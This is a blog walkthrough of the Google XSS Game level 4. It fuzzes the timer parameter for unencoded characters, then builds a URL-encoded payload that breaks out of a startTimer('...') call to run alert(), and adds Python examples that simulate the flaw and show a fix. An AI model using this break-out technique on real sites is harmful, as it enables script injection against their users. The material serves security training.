It has been a long time since I put up a post, so it needs to be a decent one :-) and what better way than to explain the methodology I used while solving the Google XSS Game challenge #4 (level 4). I did use all of the hints, as I was really stumped as to what to do. Anyway, below is my methodology.
So when looking at any XSS challenge you should have the following:
- An interception proxy;
- A browser which will not filter out your XSS; and
- A JS console (I use Firebug).
Without going into the details of correct encoding, it is safe to say that when non-alphanumeric characters are properly HTML-encoded, i.e. " becomes &quot; and < and > become &lt; and &gt;, it is harder to inject JS. Which character matters depends on the context the input lands in: inside a single-quoted JS string, the single quote is the one that closes the string.
Step 1: Find out where our string is injected in the source code
I injected the string 'ZZ' into the timer parameter, which is easy to spot in the response. It is reflected in two places: inside the startTimer('...') call in the onload attribute, and inside the div with id 'message'. We are more interested in the onload attribute, because its value is executed as JS.
Step 2: Check which non-alphanumeric characters are being encoded.
Open up Python and run the following to write out all of the non-alphanumeric characters, one per line. The comments explain what each line does.
# Import the string module
import string
# Create a file to write to; the with-block closes it once writing is done
with open("nonalphanumeric.txt", "w") as fdesc:
    # Slice the printable characters so only the non-alphanumeric (punctuation) ones are left
    # (string.printable[62:94] is the same set as string.punctuation) and iterate through each
    for i in string.printable[62:94]:
        # Write each character to the file, followed by a newline
        fdesc.write(i + "\n")
You should now have a file of payloads you can use to test which characters are being encoded. Keep it in a safe spot for future tests ;).
Run Burp Intruder, load the file as the payload list and fuzz the 'timer' parameter. Intruder URL-encodes some characters in payloads by default, so decide deliberately whether you want the raw character or its percent-encoded form sent; characters such as & ; # + and % would otherwise be interpreted by the query-string parser rather than reaching the application.
If the response contains the HTML-entity form of the character, e.g. &quot; for " or &lt; for <, then that character is being HTML-encoded and the browser will render it as literal text rather than as markup (this is a hint that Google provides).
After running Burp Intruder through all of the characters I noticed that the single quote was not being encoded. Here is the HTML response after injecting a single quote (').
<!doctype html>
<html>
  <head>
    <!-- Internal game scripts/styles, mostly boring stuff -->
    <script src="/static/game-frame.js"></script>
    <link rel="stylesheet" href="/static/game-frame-styles.css" />
    <script>
      function startTimer(seconds) {
        seconds = parseInt(seconds) || 3;
        setTimeout(function() {
          window.confirm("Time is up!");
          window.history.back();
        }, seconds * 1000);
      }
    </script>
  </head>
  <body id="level4">
    <img src="/static/logos/level4.png" />
    <br>
    <img src="/static/loading.gif" onload="startTimer(''');" />
    <br>
    <div id="message">Your timer will execute in ' seconds.</div>
  </body>
</html>
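As an added example (not part of the original post and not the XSS game's own code), the following Python script does offline what the Intruder run above does by hand: it wraps each punctuation character in the same 'ZZ' marker from Step 1, pushes it through a constructed stand-in for the level 4 page that HTML-encodes &, <, > and " but leaves the single quote alone, and classifies how each character came back at the onload reflection point. The renderer, the marker and the function names are assumptions made for illustration; classify() can be pointed at a real response body to triage Intruder output.

```python
import html
import string

# Probe set: the same non-alphanumeric characters the script in Step 2 writes out.
PROBES = string.punctuation  # identical to string.printable[62:94]

# Marker from Step 1: wrapping the probe in ZZ...ZZ makes the reflection easy to locate.
MARK = "ZZ"


def vulnerable_render(timer):
    """Constructed stand-in for the level 4 page (assumption, not the game's code):
    HTML-encodes &, <, > and " but leaves the single quote untouched, and drops the
    value into a single-quoted JS string inside the onload attribute."""
    escaped = html.escape(timer, quote=False).replace('"', "&quot;")
    return (
        '<img src="/static/loading.gif" onload="startTimer(\'%s\');" />\n'
        '<div id="message">Your timer will execute in %s seconds.</div>' % (escaped, escaped)
    )


def entity_forms(char):
    """The ways a character can legitimately come back HTML-entity encoded."""
    return {
        html.escape(char, quote=True),  # named form: &amp; &lt; &gt; &quot; (and &#x27; for ')
        "&#%d;" % ord(char),            # decimal numeric reference
        "&#x%x;" % ord(char),           # hex numeric reference, lower case
        "&#X%X;" % ord(char),           # hex numeric reference, upper case
    }


def classify(char, body):
    """Classify how a probe came back at the first reflection point in body:
    'raw' (unchanged), 'entity' (HTML-encoded), 'stripped' (removed),
    'altered' (something else, e.g. backslash-escaped) or 'missing' (no marker)."""
    start = body.find(MARK)
    if start == -1:
        return "missing"
    start += len(MARK)
    end = body.find(MARK, start)
    if end == -1:
        return "missing"
    reflected = body[start:end]
    if reflected == char:
        return "raw"
    if reflected in entity_forms(char):
        return "entity"
    if reflected == "":
        return "stripped"
    return "altered"


def fuzz(render=vulnerable_render):
    """Send every probe through the renderer; returns {char: classification}."""
    return {c: classify(c, render(MARK + c + MARK)) for c in PROBES}


def unencoded_specials(results):
    """HTML-significant characters that reflected raw: the break-out candidates."""
    return [c for c in "&<>\"'" if results.get(c) == "raw"]


if __name__ == "__main__":
    results = fuzz()
    for c in PROBES:
        print("%r -> %s" % (c, results[c]))
    print("HTML-significant characters reflected raw:", unencoded_specials(results))
```

Against the stand-in renderer, only the single quote among the HTML-significant characters comes back raw, which is exactly the observation the rest of the walkthrough builds on; the many other punctuation characters that reflect raw (such as ; ( and )) are harmless in HTML but are what the final payload is assembled from.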
So I reran the request in the browser with the Firebug console open to see whether any error messages were logged. An error was logged, which is a sign that the single quote was injected into the JS and broke the string literal (startTimer(''') leaves an unterminated string). So where to next?
Open up the console and paste the startTimer function from the page source into it so you have a copy to muck around with. Make sure you click 'Run'.
If you pass no value to the timer param, i.e. http://xss-game.appspot.com/level4/frame?timer= , you have the following startTimer call in the source code:
startTimer('')
How do we create an attack? Turn the one JS call into two. This is what I typed in the console:
startTimer('1');alert('1')
Execute it and you get your alert.
Now we need to put this into the timer param for it to execute:
http://xss-game.appspot.com/level4/frame?timer=1');alert('1')
But it does not work, as all characters after the ';' are removed (consistent with ';' being treated as a query-string parameter separator, so the value is cut short there).
How do we solve this? We URL-encode the non-alphanumeric characters so the attack string looks like this:
timer=1%27)%3balert(%27xss
The server decodes the value after splitting the query string, so the ';' now survives, and in the source code we get the following:
<img src="/static/loading.gif" onload="startTimer('1');alert('xss');" />
Boom, XSS.
Now copy the following URL into the address bar and you will pass challenge 4:
http://xss-game.appspot.com/level4/frame?timer=1%27)%3balert(%27xss
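As an added example, again not the post's or the game's own code, the following Python models the three things just observed: why the raw ';' cuts the value short, what the percent-encoded payload becomes once the server decodes it, and how the same template would be hardened so the value can no longer escape the JS string. The query parser, both renderers and all function names are constructed assumptions for illustration; the hardened renderer is my suggested fix, not anything the game ships.

```python
import html
import json
import re
import urllib.parse

# The break-out string from the walkthrough; the template itself supplies the closing ');
PAYLOAD = "1');alert('xss"

# Constructed stand-in for the vulnerable attribute (assumption, not the game's template).
TEMPLATE = '<img src="/static/loading.gif" onload="startTimer(%s);" />'


def encode_payload(payload):
    """Percent-encode every non-alphanumeric byte so ; ( ) ' reach the application intact."""
    return urllib.parse.quote(payload, safe="")


def parse_query(query):
    """Constructed model of the behaviour observed above: the query string is split on
    both '&' and ';' before percent-decoding, so a literal ';' cuts the value short
    while an encoded %3B survives. Assumption made for illustration."""
    params = {}
    for pair in re.split("[&;]", query):
        if "=" in pair:
            key, value = pair.split("=", 1)
            params[urllib.parse.unquote(key)] = urllib.parse.unquote(value)
    return params


def vulnerable_render(timer):
    """HTML-encodes &, <, > and " but not ', then drops the value into a single-quoted
    JS string: the same weakness the fuzzing run exposed."""
    escaped = html.escape(timer, quote=False).replace('"', "&quot;")
    return TEMPLATE % ("'" + escaped + "'")


def hardened_render(timer):
    """Fix for the JS-string-in-attribute context: JS-string-encode with json.dumps,
    then HTML-attribute-encode the result, so the value can close neither the JS
    string nor the attribute. For a numeric parameter, int(timer) with a default
    (mirroring parseInt(seconds) || 3) is simpler still."""
    return TEMPLATE % html.escape(json.dumps(timer), quote=True)


def served_onload(query, render):
    """What ends up in the page for a given raw query string and renderer."""
    return render(parse_query(query).get("timer", ""))


if __name__ == "__main__":
    print("raw payload:    ", served_onload("timer=" + PAYLOAD, vulnerable_render))
    print("encoded payload:", encode_payload(PAYLOAD))
    print("vulnerable page:", served_onload("timer=" + encode_payload(PAYLOAD), vulnerable_render))
    print("hardened page:  ", served_onload("timer=" + encode_payload(PAYLOAD), hardened_render))
```

urllib.parse.quote encodes the parentheses too and uses upper-case hex, so its output differs cosmetically from the hand-built timer=1%27)%3balert(%27xss string above, but both decode to the same value. In the hardened output the browser still decodes the entities before running the handler, giving startTimer("1');alert('xss"), which is a single string argument that parseInt turns into 1.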
Hopefully this has been informative for you :). Hack responsibly, if you have a hacking addiction please phone the help line. 1800 CNTSTPHACKING